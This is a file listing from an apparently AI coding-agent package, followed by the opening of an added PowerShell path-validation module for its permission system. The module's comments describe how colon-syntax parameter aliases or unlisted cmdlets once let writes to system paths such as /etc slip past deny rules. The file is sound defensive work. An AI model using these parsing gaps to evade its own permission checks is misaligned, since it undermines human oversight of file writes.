  1609. package/src/utils/concurrentSessions.js +179 -0
  1610. package/src/utils/config.js +1078 -0
  1611. package/src/utils/configConstants.js +18 -0
  1612. package/src/utils/contentArray.js +45 -0
  1613. package/src/utils/context.js +185 -0
  1614. package/src/utils/contextAnalysis.js +171 -0
  1615. package/src/utils/contextSuggestions.js +158 -0
  1616. package/src/utils/controlMessageCompat.js +31 -0
  1617. package/src/utils/conversationRecovery.js +434 -0
  1618. package/src/utils/cron.js +260 -0
  1619. package/src/utils/cronJitterConfig.js +62 -0
  1620. package/src/utils/cronScheduler.js +388 -0
  1621. package/src/utils/cronTasks.js +328 -0
  1622. package/src/utils/cronTasksLock.js +159 -0
  1623. package/src/utils/crossProjectResume.js +46 -0
  1624. package/src/utils/crypto.js +13 -0
  1625. package/src/utils/cwd.js +29 -0
  1626. package/src/utils/debug.js +220 -0
  1627. package/src/utils/debugFilter.js +125 -0
  1628. package/src/utils/deepLink/banner.js +103 -0
  1629. package/src/utils/deepLink/parseDeepLink.js +138 -0
  1630. package/src/utils/deepLink/protocolHandler.js +119 -0
  1631. package/src/utils/deepLink/registerProtocol.js +291 -0
  1632. package/src/utils/deepLink/terminalLauncher.js +455 -0
  1633. package/src/utils/deepLink/terminalPreference.js +51 -0
  1634. package/src/utils/desktopDeepLink.js +208 -0
  1635. package/src/utils/detectRepository.js +157 -0
  1636. package/src/utils/diagLogs.js +74 -0
  1637. package/src/utils/diff.js +108 -0
  1638. package/src/utils/directMemberMessage.js +34 -0
  1639. package/src/utils/displayTags.js +46 -0
  1640. package/src/utils/doctorContextWarnings.js +179 -0
  1641. package/src/utils/doctorDiagnostic.js +494 -0
  1642. package/src/utils/dxt/helpers.js +64 -0
  1643. package/src/utils/dxt/zip.js +167 -0
  1644. package/src/utils/earlyInput.js +166 -0
  1645. package/src/utils/editor.js +163 -0
  1646. package/src/utils/effort.js +271 -0
  1647. package/src/utils/embeddedTools.js +26 -0
  1648. package/src/utils/employeeChat.js +271 -0
  1649. package/src/utils/employeeDb.js +326 -0
  1650. package/src/utils/env.js +358 -0
  1651. package/src/utils/envDynamic.js +130 -0
  1652. package/src/utils/envUtils.js +161 -0
  1653. package/src/utils/envValidation.js +26 -0
  1654. package/src/utils/errorLogSink.js +196 -0
  1655. package/src/utils/errors.js +207 -0
  1656. package/src/utils/exampleCommands.js +165 -0
  1657. package/src/utils/execFileNoThrow.js +93 -0
  1658. package/src/utils/execFileNoThrowPortable.js +49 -0
  1659. package/src/utils/execSyncWrapper.js +6 -0
  1660. package/src/utils/exportRenderer.js +71 -0
  1661. package/src/utils/extraUsage.js +19 -0
  1662. package/src/utils/fastMode.js +393 -0
  1663. package/src/utils/file.js +467 -0
  1664. package/src/utils/fileHistory.js +851 -0
  1665. package/src/utils/fileOperationAnalytics.js +45 -0
  1666. package/src/utils/filePersistence/filePersistence.js +212 -0
  1667. package/src/utils/filePersistence/outputsScanner.js +104 -0
  1668. package/src/utils/filePersistence/types.js +4 -0
  1669. package/src/utils/fileRead.js +81 -0
  1670. package/src/utils/fileReadCache.js +78 -0
  1671. package/src/utils/fileStateCache.js +99 -0
  1672. package/src/utils/findExecutable.js +13 -0
  1673. package/src/utils/fingerprint.js +58 -0
  1674. package/src/utils/forkedAgent.js +410 -0
  1675. package/src/utils/format.js +238 -0
  1676. package/src/utils/formatBriefTimestamp.js +72 -0
  1677. package/src/utils/fpsTracker.js +34 -0
  1678. package/src/utils/frontmatterParser.js +260 -0
  1679. package/src/utils/fsOperations.js +555 -0
  1680. package/src/utils/fullscreen.js +194 -0
  1681. package/src/utils/generatedFiles.js +122 -0
  1682. package/src/utils/generators.js +67 -0
  1683. package/src/utils/genericProcessUtils.js +155 -0
  1684. package/src/utils/getWorktreePaths.js +56 -0
  1685. package/src/utils/getWorktreePathsPortable.js +23 -0
  1686. package/src/utils/ghPrStatus.js +71 -0
  1687. package/src/utils/git/gitConfigParser.js +226 -0
  1688. package/src/utils/git/gitFilesystem.js +606 -0
  1689. package/src/utils/git/gitignore.js +84 -0
  1690. package/src/utils/git.js +725 -0
  1691. package/src/utils/gitDiff.js +395 -0
  1692. package/src/utils/gitSettings.js +18 -0
  1693. package/src/utils/github/ghAuthStatus.js +23 -0
  1694. package/src/utils/githubRepoPathMapping.js +135 -0
  1695. package/src/utils/glob.js +90 -0
  1696. package/src/utils/gracefulShutdown.js +447 -0
  1697. package/src/utils/groupToolUses.js +126 -0
  1698. package/src/utils/handlePromptSubmit.js +398 -0
  1699. package/src/utils/hash.js +44 -0
  1700. package/src/utils/headlessProfiler.js +147 -0
  1701. package/src/utils/heapDumpService.js +201 -0
  1702. package/src/utils/heatmap.js +151 -0
  1703. package/src/utils/highlightMatch.js +29 -0
  1704. package/src/utils/hooks/AsyncHookRegistry.js +187 -0
  1705. package/src/utils/hooks/apiQueryHookHelper.js +77 -0
  1706. package/src/utils/hooks/execAgentHook.js +257 -0
  1707. package/src/utils/hooks/execHttpHook.js +184 -0
  1708. package/src/utils/hooks/execPromptHook.js +171 -0
  1709. package/src/utils/hooks/fileChangedWatcher.js +161 -0
  1710. package/src/utils/hooks/hookEvents.js +111 -0
  1711. package/src/utils/hooks/hookHelpers.js +60 -0
  1712. package/src/utils/hooks/hooksConfigManager.js +323 -0
  1713. package/src/utils/hooks/hooksConfigSnapshot.js +114 -0
  1714. package/src/utils/hooks/hooksSettings.js +204 -0
  1715. package/src/utils/hooks/postSamplingHooks.js +39 -0
  1716. package/src/utils/hooks/registerFrontmatterHooks.js +47 -0
  1717. package/src/utils/hooks/registerSkillHooks.js +40 -0
  1718. package/src/utils/hooks/sessionHooks.js +252 -0
  1719. package/src/utils/hooks/skillImprovement.js +211 -0
  1720. package/src/utils/hooks/ssrfGuard.js +258 -0
  1721. package/src/utils/hooks.js +3668 -0
  1722. package/src/utils/horizontalScroll.js +108 -0
  1723. package/src/utils/http.js +120 -0
  1724. package/src/utils/hyperlink.js +28 -0
  1725. package/src/utils/iTermBackup.js +48 -0
  1726. package/src/utils/ide.js +1195 -0
  1727. package/src/utils/idePathConversion.js +66 -0
  1728. package/src/utils/idleTimeout.js +44 -0
  1729. package/src/utils/imagePaste.js +343 -0
  1730. package/src/utils/imageResizer.js +664 -0
  1731. package/src/utils/imageStore.js +150 -0
  1732. package/src/utils/imageValidation.js +92 -0
  1733. package/src/utils/immediateCommand.js +12 -0
  1734. package/src/utils/inProcessTeammateHelpers.js +71 -0
  1735. package/src/utils/ink.js +20 -0
  1736. package/src/utils/intl.js +83 -0
  1737. package/src/utils/jetbrains.js +152 -0
  1738. package/src/utils/json.js +231 -0
  1739. package/src/utils/jsonRead.js +14 -0
  1740. package/src/utils/keyboardShortcuts.js +11 -0
  1741. package/src/utils/lazySchema.js +8 -0
  1742. package/src/utils/listSessionsImpl.js +332 -0
  1743. package/src/utils/localInstaller.js +130 -0
  1744. package/src/utils/lockfile.js +30 -0
  1745. package/src/utils/log.js +280 -0
  1746. package/src/utils/logoV2Utils.js +256 -0
  1747. package/src/utils/mailbox.js +50 -0
  1748. package/src/utils/managedEnv.js +160 -0
  1749. package/src/utils/managedEnvConstants.js +185 -0
  1750. package/src/utils/markdown.js +315 -0
  1751. package/src/utils/markdownConfigLoader.js +480 -0
  1752. package/src/utils/mcp/dateTimeParser.js +102 -0
  1753. package/src/utils/mcp/elicitationValidation.js +259 -0
  1754. package/src/utils/mcpInstructionsDelta.js +97 -0
  1755. package/src/utils/mcpOutputStorage.js +159 -0
  1756. package/src/utils/mcpValidation.js +165 -0
  1757. package/src/utils/mcpWebSocketTransport.js +180 -0
  1758. package/src/utils/memoize.js +205 -0
  1759. package/src/utils/memory/types.js +9 -0
  1760. package/src/utils/memory/versions.js +7 -0
  1761. package/src/utils/memoryFileDetection.js +245 -0
  1762. package/src/utils/messagePredicates.js +6 -0
  1763. package/src/utils/messageQueueManager.js +430 -0
  1764. package/src/utils/messages/mappers.js +240 -0
  1765. package/src/utils/messages/systemInit.js +72 -0
  1766. package/src/utils/messages.js +4286 -0
  1767. package/src/utils/model/agent.js +128 -0
  1768. package/src/utils/model/aliases.js +21 -0
  1769. package/src/utils/model/antModels.js +25 -0
  1770. package/src/utils/model/bedrock.js +220 -0
  1771. package/src/utils/model/check1mAccess.js +64 -0
  1772. package/src/utils/model/configs.js +86 -0
  1773. package/src/utils/model/contextWindowUpgradeCheck.js +41 -0
  1774. package/src/utils/model/deprecation.js +72 -0
  1775. package/src/utils/model/model.js +533 -0
  1776. package/src/utils/model/modelAllowlist.js +148 -0
  1777. package/src/utils/model/modelCapabilities.js +105 -0
  1778. package/src/utils/model/modelOptions.js +450 -0
  1779. package/src/utils/model/modelStrings.js +144 -0
  1780. package/src/utils/model/modelSupportOverrides.js +40 -0
  1781. package/src/utils/model/providers.js +35 -0
  1782. package/src/utils/model/validateModel.js +131 -0
  1783. package/src/utils/modelCost.js +160 -0
  1784. package/src/utils/modifiers.js +39 -0
  1785. package/src/utils/mtls.js +132 -0
  1786. package/src/utils/nativeInstaller/download.js +370 -0
  1787. package/src/utils/nativeInstaller/index.js +8 -0
  1788. package/src/utils/nativeInstaller/installer.js +1395 -0
  1789. package/src/utils/nativeInstaller/packageManagers.js +258 -0
  1790. package/src/utils/nativeInstaller/pidLock.js +347 -0
  1791. package/src/utils/notebook.js +176 -0
  1792. package/src/utils/objectGroupBy.js +15 -0
  1793. package/src/utils/pasteStore.js +93 -0
  1794. package/src/utils/path.js +140 -0
  1795. package/src/utils/pdf.js +236 -0
  1796. package/src/utils/pdfUtils.js +61 -0
  1797. package/src/utils/peerAddress.js +20 -0
  1798. package/src/utils/permissions/PermissionMode.js +95 -0
  1799. package/src/utils/permissions/PermissionPromptToolResultSchema.js +85 -0
  1800. package/src/utils/permissions/PermissionResult.js +11 -0
  1801. package/src/utils/permissions/PermissionRule.js +19 -0
  1802. package/src/utils/permissions/PermissionUpdate.js +268 -0
  1803. package/src/utils/permissions/PermissionUpdateSchema.js +61 -0
  1804. package/src/utils/permissions/autoModeState.js +31 -0
  1805. package/src/utils/permissions/bashClassifier.js +30 -0
  1806. package/src/utils/permissions/bypassPermissionsKillswitch.js +115 -0
  1807. package/src/utils/permissions/classifierDecision.js +86 -0
  1808. package/src/utils/permissions/classifierShared.js +28 -0
  1809. package/src/utils/permissions/dangerousPatterns.js +78 -0
  1810. package/src/utils/permissions/denialTracking.js +34 -0
  1811. package/src/utils/permissions/filesystem.js +1411 -0
  1812. package/src/utils/permissions/getNextPermissionMode.js +74 -0
  1813. package/src/utils/permissions/pathValidation.js +351 -0
  1814. package/src/utils/permissions/permissionExplainer.js +188 -0
  1815. package/src/utils/permissions/permissionRuleParser.js +175 -0
  1816. package/src/utils/permissions/permissionSetup.js +1162 -0
  1817. package/src/utils/permissions/permissions.js +1063 -0
  1818. package/src/utils/permissions/permissionsLoader.js +217 -0
  1819. package/src/utils/permissions/shadowedRuleDetection.js +149 -0
  1820. package/src/utils/permissions/shellRuleMatching.js +174 -0
  1821. package/src/utils/permissions/yoloClassifier.js +1193 -0
  1822. package/src/utils/planModeV2.js +75 -0
  1823. package/src/utils/plans.js +334 -0
  1824. package/src/utils/platform.js +122 -0
  1825. package/src/utils/plugins/addDirPluginSettings.js +53 -0
  1826. package/src/utils/plugins/cacheUtils.js +174 -0
  1827. package/src/utils/plugins/dependencyResolver.js +244 -0
  1828. package/src/utils/plugins/fetchTelemetry.js +108 -0
  1829. package/src/utils/plugins/gitAvailability.js +65 -0
  1830. package/src/utils/plugins/headlessPluginInstall.js +136 -0
  1831. package/src/utils/plugins/hintRecommendation.js +136 -0
  1832. package/src/utils/plugins/installCounts.js +221 -0
  1833. package/src/utils/plugins/installedPluginsManager.js +1003 -0
  1834. package/src/utils/plugins/loadPluginAgents.js +219 -0
  1835. package/src/utils/plugins/loadPluginCommands.js +595 -0
  1836. package/src/utils/plugins/loadPluginHooks.js +239 -0
  1837. package/src/utils/plugins/loadPluginOutputStyles.js +112 -0
  1838. package/src/utils/plugins/lspPluginIntegration.js +293 -0
  1839. package/src/utils/plugins/lspRecommendation.js +278 -0
  1840. package/src/utils/plugins/managedPlugins.js +26 -0
  1841. package/src/utils/plugins/marketplaceHelpers.js +470 -0
  1842. package/src/utils/plugins/marketplaceManager.js +1939 -0
  1843. package/src/utils/plugins/mcpPluginIntegration.js +465 -0
  1844. package/src/utils/plugins/mcpbHandler.js +708 -0
  1845. package/src/utils/plugins/officialMarketplace.js +19 -0
  1846. package/src/utils/plugins/officialMarketplaceGcs.js +202 -0
  1847. package/src/utils/plugins/officialMarketplaceStartupCheck.js +344 -0
  1848. package/src/utils/plugins/orphanedPluginFilter.js +96 -0
  1849. package/src/utils/plugins/parseMarketplaceInput.js +143 -0
  1850. package/src/utils/plugins/performStartupChecks.js +66 -0
  1851. package/src/utils/plugins/pluginAutoupdate.js +210 -0
  1852. package/src/utils/plugins/pluginBlocklist.js +93 -0
  1853. package/src/utils/plugins/pluginDirectories.js +170 -0
  1854. package/src/utils/plugins/pluginFlagging.js +173 -0
  1855. package/src/utils/plugins/pluginIdentifier.js +78 -0
  1856. package/src/utils/plugins/pluginInstallationHelpers.js +400 -0
  1857. package/src/utils/plugins/pluginLoader.js +2426 -0
  1858. package/src/utils/plugins/pluginOptionsStorage.js +311 -0
  1859. package/src/utils/plugins/pluginPolicy.js +18 -0
  1860. package/src/utils/plugins/pluginStartupCheck.js +261 -0
  1861. package/src/utils/plugins/pluginVersioning.js +128 -0
  1862. package/src/utils/plugins/reconciler.js +181 -0
  1863. package/src/utils/plugins/refresh.js +162 -0
  1864. package/src/utils/plugins/schemas.js +1283 -0
  1865. package/src/utils/plugins/validatePlugin.js +765 -0
  1866. package/src/utils/plugins/walkPluginMarkdown.js +49 -0
  1867. package/src/utils/plugins/zipCache.js +346 -0
  1868. package/src/utils/plugins/zipCacheAdapters.js +133 -0
  1869. package/src/utils/powershell/dangerousCmdlets.js +174 -0
  1870. package/src/utils/powershell/parser.js +1357 -0
  1871. package/src/utils/powershell/staticPrefix.js +277 -0
  1872. package/src/utils/preflightChecks.js +147 -0
  1873. package/src/utils/privacyLevel.js +49 -0
  1874. package/src/utils/process.js +56 -0
  1875. package/src/utils/processUserInput/processBashCommand.js +118 -0
  1876. package/src/utils/processUserInput/processSlashCommand.js +845 -0
  1877. package/src/utils/processUserInput/processTextPrompt.js +68 -0
  1878. package/src/utils/processUserInput/processUserInput.js +344 -0
  1879. package/src/utils/profilerBase.js +32 -0
  1880. package/src/utils/promptCategory.js +39 -0
  1881. package/src/utils/promptEditor.js +151 -0
  1882. package/src/utils/promptShellExecution.js +117 -0
  1883. package/src/utils/protectedNamespace.js +4 -0
  1884. package/src/utils/proxy.js +345 -0
  1885. package/src/utils/queryContext.js +110 -0
  1886. package/src/utils/queryHelpers.js +436 -0
  1887. package/src/utils/queryProfiler.js +242 -0
  1888. package/src/utils/queueProcessor.js +70 -0
  1889. package/src/utils/readEditContext.js +176 -0
  1890. package/src/utils/readFileInRange.js +278 -0
  1891. package/src/utils/releaseNotes.js +307 -0
  1892. package/src/utils/renderOptions.js +67 -0
  1893. package/src/utils/ripgrep.js +521 -0
  1894. package/src/utils/sandbox/sandbox-adapter.js +750 -0
  1895. package/src/utils/sandbox/sandbox-ui-utils.js +11 -0
  1896. package/src/utils/sanitization.js +72 -0
  1897. package/src/utils/screenshotClipboard.js +89 -0
  1898. package/src/utils/sdkEventQueue.js +49 -0
  1899. package/src/utils/secureStorage/fallbackStorage.js +59 -0
  1900. package/src/utils/secureStorage/index.js +13 -0
  1901. package/src/utils/secureStorage/keychainPrefetch.js +91 -0
  1902. package/src/utils/secureStorage/macOsKeychainHelpers.js +91 -0
  1903. package/src/utils/secureStorage/macOsKeychainStorage.js +192 -0
  1904. package/src/utils/secureStorage/plainTextStorage.js +81 -0
  1905. package/src/utils/semanticBoolean.js +23 -0
  1906. package/src/utils/semanticNumber.js +34 -0
  1907. package/src/utils/semver.js +51 -0
  1908. package/src/utils/sequential.js +43 -0
  1909. package/src/utils/sessionActivity.js +120 -0
  1910. package/src/utils/sessionEnvVars.js +18 -0
  1911. package/src/utils/sessionEnvironment.js +131 -0
  1912. package/src/utils/sessionFileAccessHooks.js +205 -0
  1913. package/src/utils/sessionIngressAuth.js +113 -0
  1914. package/src/utils/sessionRestore.js +357 -0
  1915. package/src/utils/sessionStart.js +165 -0
  1916. package/src/utils/sessionState.js +76 -0
  1917. package/src/utils/sessionStorage.js +4162 -0
  1918. package/src/utils/sessionStoragePortable.js +665 -0
  1919. package/src/utils/sessionTitle.js +120 -0
  1920. package/src/utils/sessionUrl.js +50 -0
  1921. package/src/utils/set.js +50 -0
  1922. package/src/utils/settings/allErrors.js +29 -0
  1923. package/src/utils/settings/applySettingsChange.js +65 -0
  1924. package/src/utils/settings/changeDetector.js +409 -0
  1925. package/src/utils/settings/constants.js +166 -0
  1926. package/src/utils/settings/internalWrites.js +33 -0
  1927. package/src/utils/settings/managedPath.js +29 -0
  1928. package/src/utils/settings/mdm/constants.js +62 -0
  1929. package/src/utils/settings/mdm/rawRead.js +97 -0
  1930. package/src/utils/settings/mdm/settings.js +254 -0
  1931. package/src/utils/settings/permissionValidation.js +224 -0
  1932. package/src/utils/settings/pluginOnlyPolicy.js +53 -0
  1933. package/src/utils/settings/schemaOutput.js +7 -0
  1934. package/src/utils/settings/settings.js +791 -0
  1935. package/src/utils/settings/settingsCache.js +47 -0
  1936. package/src/utils/settings/toolValidationConfig.js +76 -0
  1937. package/src/utils/settings/types.js +846 -0
  1938. package/src/utils/settings/validateEditTool.js +34 -0
  1939. package/src/utils/settings/validation.js +192 -0
  1940. package/src/utils/settings/validationTips.js +111 -0
  1941. package/src/utils/shell/bashProvider.js +202 -0
  1942. package/src/utils/shell/outputLimits.js +7 -0
  1943. package/src/utils/shell/powershellDetection.js +96 -0
  1944. package/src/utils/shell/powershellProvider.js +104 -0
  1945. package/src/utils/shell/prefix.js +246 -0
  1946. package/src/utils/shell/readOnlyCommandValidation.js +1776 -0
  1947. package/src/utils/shell/resolveDefaultShell.js +13 -0
  1948. package/src/utils/shell/shellProvider.js +2 -0
  1949. package/src/utils/shell/shellToolUtils.js +21 -0
  1950. package/src/utils/shell/specPrefix.js +198 -0
  1951. package/src/utils/shellConfig.js +136 -0
  1952. package/src/utils/sideQuery.js +134 -0
  1953. package/src/utils/sideQuestion.js +121 -0
  1954. package/src/utils/signal.js +34 -0
  1955. package/src/utils/sinks.js +15 -0
  1956. package/src/utils/skills/skillChangeDetector.js +264 -0
  1957. package/src/utils/slashCommandParsing.js +46 -0
  1958. package/src/utils/sleep.js +72 -0
  1959. package/src/utils/sliceAnsi.js +74 -0
  1960. package/src/utils/slowOperations.js +216 -0
  1961. package/src/utils/standaloneAgent.js +20 -0
  1962. package/src/utils/startupProfiler.js +149 -0
  1963. package/src/utils/staticRender.js +104 -0
  1964. package/src/utils/stats.js +802 -0
  1965. package/src/utils/statsCache.js +330 -0
  1966. package/src/utils/status.js +359 -0
  1967. package/src/utils/statusNoticeDefinitions.js +123 -0
  1968. package/src/utils/statusNoticeHelpers.js +15 -0
  1969. package/src/utils/stream.js +73 -0
  1970. package/src/utils/streamJsonStdoutGuard.js +107 -0
  1971. package/src/utils/streamlinedTransform.js +162 -0
  1972. package/src/utils/stringUtils.js +202 -0
  1973. package/src/utils/subprocessEnv.js +87 -0
  1974. package/src/utils/suggestions/commandSuggestions.js +458 -0
  1975. package/src/utils/suggestions/directoryCompletion.js +191 -0
  1976. package/src/utils/suggestions/shellHistoryCompletion.js +95 -0
  1977. package/src/utils/suggestions/skillUsageTracking.js +50 -0
  1978. package/src/utils/suggestions/slackChannelSuggestions.js +169 -0
  1979. package/src/utils/swarm/It2SetupPrompt.js +386 -0
  1980. package/src/utils/swarm/backends/ITermBackend.js +276 -0
  1981. package/src/utils/swarm/backends/InProcessBackend.js +237 -0
  1982. package/src/utils/swarm/backends/PaneBackendExecutor.js +250 -0
  1983. package/src/utils/swarm/backends/TmuxBackend.js +574 -0
  1984. package/src/utils/swarm/backends/detection.js +112 -0
  1985. package/src/utils/swarm/backends/it2Setup.js +185 -0
  1986. package/src/utils/swarm/backends/registry.js +369 -0
  1987. package/src/utils/swarm/backends/teammateModeSnapshot.js +68 -0
  1988. package/src/utils/swarm/backends/types.js +9 -0
  1989. package/src/utils/swarm/constants.js +29 -0
  1990. package/src/utils/swarm/inProcessRunner.js +1021 -0
  1991. package/src/utils/swarm/leaderPermissionBridge.js +31 -0
  1992. package/src/utils/swarm/permissionSync.js +667 -0
  1993. package/src/utils/swarm/reconnection.js +82 -0
  1994. package/src/utils/swarm/spawnInProcess.js +218 -0
  1995. package/src/utils/swarm/spawnUtils.js +123 -0
  1996. package/src/utils/swarm/teamHelpers.js +484 -0
  1997. package/src/utils/swarm/teammateInit.js +87 -0
  1998. package/src/utils/swarm/teammateLayoutManager.js +82 -0
  1999. package/src/utils/swarm/teammateModel.js +9 -0
  2000. package/src/utils/swarm/teammatePromptAddendum.js +17 -0
  2001. package/src/utils/systemDirectories.js +51 -0
  2002. package/src/utils/systemPrompt.js +88 -0
  2003. package/src/utils/systemPromptType.js +9 -0
  2004. package/src/utils/systemTheme.js +108 -0
  2005. package/src/utils/taggedId.js +49 -0
  2006. package/src/utils/task/TaskOutput.js +320 -0
  2007. package/src/utils/task/diskOutput.js +387 -0
  2008. package/src/utils/task/framework.js +236 -0
  2009. package/src/utils/task/outputFormatting.js +24 -0
  2010. package/src/utils/task/sdkProgress.js +24 -0
  2011. package/src/utils/taskSummary.js +3 -0
  2012. package/src/utils/tasks.js +672 -0
  2013. package/src/utils/teamDiscovery.js +48 -0
  2014. package/src/utils/teamMemoryOps.js +67 -0
  2015. package/src/utils/teammate.js +237 -0
  2016. package/src/utils/teammateContext.js +56 -0
  2017. package/src/utils/teammateMailbox.js +793 -0
  2018. package/src/utils/telemetry/betaSessionTracing.js +25 -0
  2019. package/src/utils/telemetry/bigqueryExporter.js +17 -0
  2020. package/src/utils/telemetry/events.js +7 -0
  2021. package/src/utils/telemetry/instrumentation.js +16 -0
  2022. package/src/utils/telemetry/logger.js +25 -0
  2023. package/src/utils/telemetry/perfettoTracing.js +882 -0
  2024. package/src/utils/telemetry/pluginTelemetry.js +76 -0
  2025. package/src/utils/telemetry/sessionTracing.js +62 -0
  2026. package/src/utils/telemetry/skillLoadedEvent.js +4 -0
  2027. package/src/utils/telemetryAttributes.js +56 -0
  2028. package/src/utils/teleport/api.js +299 -0
  2029. package/src/utils/teleport/environmentSelection.js +55 -0
  2030. package/src/utils/teleport/environments.js +84 -0
  2031. package/src/utils/teleport/gitBundle.js +192 -0
  2032. package/src/utils/teleport.js +1047 -0
  2033. package/src/utils/tempfile.js +26 -0
  2034. package/src/utils/terminal.js +105 -0
  2035. package/src/utils/terminalPanel.js +155 -0
  2036. package/src/utils/textHighlighting.js +113 -0
  2037. package/src/utils/thaddeusHints.js +142 -0
  2038. package/src/utils/theme.js +525 -0
  2039. package/src/utils/thinking.js +130 -0
  2040. package/src/utils/timeouts.js +35 -0
  2041. package/src/utils/tmuxSocket.js +373 -0
  2042. package/src/utils/todo/types.js +9 -0
  2043. package/src/utils/tokenBudget.js +62 -0
  2044. package/src/utils/tokens.js +223 -0
  2045. package/src/utils/toolErrors.js +101 -0
  2046. package/src/utils/toolPool.js +61 -0
  2047. package/src/utils/toolResultStorage.js +768 -0
  2048. package/src/utils/toolSchemaCache.js +7 -0
  2049. package/src/utils/toolSearch.js +551 -0
  2050. package/src/utils/transcriptSearch.js +200 -0
  2051. package/src/utils/treeify.js +111 -0
  2052. package/src/utils/truncate.js +164 -0
  2053. package/src/utils/udsClient.js +5 -0
  2054. package/src/utils/udsMessaging.js +23 -0
  2055. package/src/utils/ultraplan/ccrSession.js +264 -0
  2056. package/src/utils/ultraplan/keyword.js +122 -0
  2057. package/src/utils/unaryLogging.js +16 -0
  2058. package/src/utils/undercover.js +89 -0
  2059. package/src/utils/user.js +137 -0
  2060. package/src/utils/userAgent.js +9 -0
  2061. package/src/utils/userPromptKeywords.js +21 -0
  2062. package/src/utils/uuid.js +22 -0
  2063. package/src/utils/warningHandler.js +97 -0
  2064. package/src/utils/which.js +75 -0
  2065. package/src/utils/windowsPaths.js +146 -0
  2066. package/src/utils/withResolvers.js +13 -0
  2067. package/src/utils/words.js +793 -0
  2068. package/src/utils/workforceIntent.js +192 -0
  2069. package/src/utils/workloadContext.js +42 -0
  2070. package/src/utils/worktree.js +1142 -0
  2071. package/src/utils/worktreeModeEnabled.js +11 -0
  2072. package/src/utils/xdg.js +52 -0
  2073. package/src/utils/xml.js +15 -0
  2074. package/src/utils/yaml.js +14 -0
  2075. package/src/utils/zodToJsonSchema.js +19 -0
  2076. package/src/vim/motions.js +73 -0
  2077. package/src/vim/operators.js +401 -0
  2078. package/src/vim/textObjects.js +153 -0
  2079. package/src/vim/transitions.js +340 -0
  2080. package/src/vim/types.js +93 -0
  2081. package/src/voice/voiceModeEnabled.js +20 -0
  2082. package/thaddeus-terminal.ts +401 -3
@@ -0,0 +1,1712 @@
1
+ /**
2
+ * PowerShell-specific path validation for command arguments.
3
+ *
4
+ * Extracts file paths from PowerShell commands using the AST parser
5
+ * and validates they stay within allowed project directories.
6
+ * Follows the same patterns as BashTool/pathValidation.ts.
7
+ */
8
+ import { homedir } from 'os';
9
+ import { isAbsolute, resolve } from 'path';
10
+ import { getCwd } from '../../utils/cwd.js';
11
+ import { getFsImplementation, safeResolvePath, } from '../../utils/fsOperations.js';
12
+ import { containsPathTraversal, getDirectoryForPath } from '../../utils/path.js';
13
+ import { allWorkingDirectories, checkEditableInternalPath, checkPathSafetyForAutoEdit, checkReadableInternalPath, matchingRuleForInput, pathInAllowedWorkingPath, } from '../../utils/permissions/filesystem.js';
14
+ import { createReadRuleSuggestion } from '../../utils/permissions/PermissionUpdate.js';
15
+ import { isDangerousRemovalPath, isPathInSandboxWriteAllowlist, } from '../../utils/permissions/pathValidation.js';
16
+ import { getPlatform } from '../../utils/platform.js';
17
+ import { isNullRedirectionTarget, isPowerShellParameter, } from '../../utils/powershell/parser.js';
18
+ import { COMMON_SWITCHES, COMMON_VALUE_PARAMS } from './commonParameters.js';
19
+ import { resolveToCanonical } from './readOnlyValidation.js';
20
+ const MAX_DIRS_TO_LIST = 5;
21
+ // PowerShell wildcards are only * ? [ ] — braces are LITERAL characters
22
+ // (no brace expansion). Including {} mis-routed paths like `./{x}/passwd`
23
+ // through glob-base truncation instead of full-path symlink resolution.
24
+ const GLOB_PATTERN_REGEX = /[*?[\]]/;
25
+ const CMDLET_PATH_CONFIG = {
26
+ // ─── Write/create operations ──────────────────────────────────────────────
27
+ 'set-content': {
28
+ operationType: 'write',
29
+ // -PSPath and -LP are runtime aliases for -LiteralPath on all provider
30
+ // cmdlets. Without them, colon syntax (-PSPath:/etc/x) falls to the
31
+ // unknown-param branch → path trapped → paths=[] → deny never consulted.
32
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
33
+ knownSwitches: [
34
+ '-passthru',
35
+ '-force',
36
+ '-whatif',
37
+ '-confirm',
38
+ '-usetransaction',
39
+ '-nonewline',
40
+ '-asbytestream', // PS 6+
41
+ ],
42
+ knownValueParams: [
43
+ '-value',
44
+ '-filter',
45
+ '-include',
46
+ '-exclude',
47
+ '-credential',
48
+ '-encoding',
49
+ '-stream',
50
+ ],
51
+ },
52
+ 'add-content': {
53
+ operationType: 'write',
54
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
55
+ knownSwitches: [
56
+ '-passthru',
57
+ '-force',
58
+ '-whatif',
59
+ '-confirm',
60
+ '-usetransaction',
61
+ '-nonewline',
62
+ '-asbytestream', // PS 6+
63
+ ],
64
+ knownValueParams: [
65
+ '-value',
66
+ '-filter',
67
+ '-include',
68
+ '-exclude',
69
+ '-credential',
70
+ '-encoding',
71
+ '-stream',
72
+ ],
73
+ },
74
+ 'remove-item': {
75
+ operationType: 'write',
76
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
77
+ knownSwitches: [
78
+ '-recurse',
79
+ '-force',
80
+ '-whatif',
81
+ '-confirm',
82
+ '-usetransaction',
83
+ ],
84
+ knownValueParams: [
85
+ '-filter',
86
+ '-include',
87
+ '-exclude',
88
+ '-credential',
89
+ '-stream',
90
+ ],
91
+ },
92
+ 'clear-content': {
93
+ operationType: 'write',
94
+ pathParams: ['-path', '-literalpath', '-pspath', '-lp'],
95
+ knownSwitches: ['-force', '-whatif', '-confirm', '-usetransaction'],
96
+ knownValueParams: [
97
+ '-filter',
98
+ '-include',
99
+ '-exclude',
100
+ '-credential',
101
+ '-stream',
102
+ ],
103
+ },
104
+ // Out-File/Tee-Object/Export-Csv/Export-Clixml were absent, so path-level
105
+ // deny rules (Edit(/etc/**)) hard-blocked `Set-Content /etc/x` but only
106
+ // *asked* for `Out-File /etc/x`. All four are write cmdlets that accept
107
+ // file paths positionally.
108
+ 'out-file': {
109
+ operationType: 'write',
110
+ // Out-File uses -FilePath (position 0). -Path is PowerShell's documented
111
+ // ALIAS for -FilePath — must be in pathParams or `Out-File -Path:./x`
112
+ // (colon syntax, one token) falls to unknown-param → value trapped →
113
+ // paths=[] → Edit deny never consulted → ask (fail-safe but deny downgrade).
114
+ pathParams: ['-filepath', '-path', '-literalpath', '-pspath', '-lp'],
115
+ knownSwitches: [
116
+ '-append',
117
+ '-force',
118
+ '-noclobber',
119
+ '-nonewline',
120
+ '-whatif',
121
+ '-confirm',
122
+ ],
123
+ knownValueParams: ['-inputobject', '-encoding', '-width'],
124
+ },
125
+ 'tee-object': {
126
+ operationType: 'write',
127
+ // Tee-Object uses -FilePath (position 0, alias: -Path). -Variable NOT a path.
128
